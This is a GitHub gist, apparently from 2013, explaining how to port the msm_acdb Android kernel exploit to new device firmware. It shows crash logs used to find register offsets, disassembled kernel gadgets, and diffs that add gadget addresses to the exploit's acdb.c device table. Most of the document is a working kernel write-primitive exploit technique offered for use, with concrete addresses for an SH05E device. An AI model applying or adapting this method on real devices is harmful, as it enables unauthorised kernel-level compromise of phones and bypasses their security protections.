Skip to content

Instantly share code, notes, and snippets.

@fi01

fi01/How to use msm_acdb explot

Created July 28, 2013 04:42
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save fi01/6097436 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save fi01/6097436 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. fi01 created this gist Jul 28, 2013.
    98 changes: 98 additions & 0 deletions How to use msm_acdb explot
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,98 @@
    To use msm_acdb explot we need to work 4 steps.
    1. Find how to run command with root or system previlege
    2. Get offset for registers to setup
    3. Choose proper code in kernel image
    4. Setup parameters in acdb.c


    1. Find how to run command with root or system previlege
    Do it your self. :-P


    2. Get offset for registers to setup
    - Add dummy entry to get crach log.

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
    { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
    { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    + { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },
    { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
    { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
    { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

    - Build tool

    - Stop services to avoid lost data

    - Run tool with root or system previlege
    It will be reboot due to cause kernel panic.

    - See crash log
    (e.g. /proc/last_kmsg or log partition)
    <3>[ 348.770486] ACDB=> ACDB ioctl not found!
    <1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
    <1>[ 348.770608] pgd = df18c000
    <1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
    <0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
    <4>[ 348.770761] Modules linked in:
    <4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1)
    <4>[ 348.770853] PC is at 0x9c
    <4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860
    <4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013
    <4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098
    <4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c
    <4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c
    <4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000
    <4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user

    You'll found offset for register in buffer.
    R4 : 0x7c
    R5 : 0x80
    R6 : 0x84
    R7 : 0x88
    R8 : 0x8c
    R9 : 0x90
    R10: 0x94
    R11: 0x98
    PC : 0x9c

    - Disassemble do_vfs_ioctl and check return code
    c021d8fc: e2 8d d0 44 ADD SP, SP, #$44
    c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

    You'll found add 0x44 bytes to SP and restore register R4-R9 and PC.

    3. Choose proper code in kernel image
    - Choose code to write value and to end do_vfs_ioctl code from kernel image
    They should use same size on stack and restore same registers with do_vfs_ioctl like this:

    write code: use R9 as write address and R5 as write value, and use 0x20 bytes
    c0381b98: e5 89 50 00 STR R5, [R9]
    c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC }

    end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC
    c0231b98: e2 8d d0 24 ADD SP, SP, #$24
    c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

    4. Setup parameters in acdb.c
    - Setup parameters in acdb.c
    Write value is R5, offset = 0x80
    Write address is R9, offset = 0x90
    Write code is offset 0x9c and address = 0xc0381b98
    End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
    { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
    { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    + { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
    { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
    { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
    { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

    That's all. Have fun!!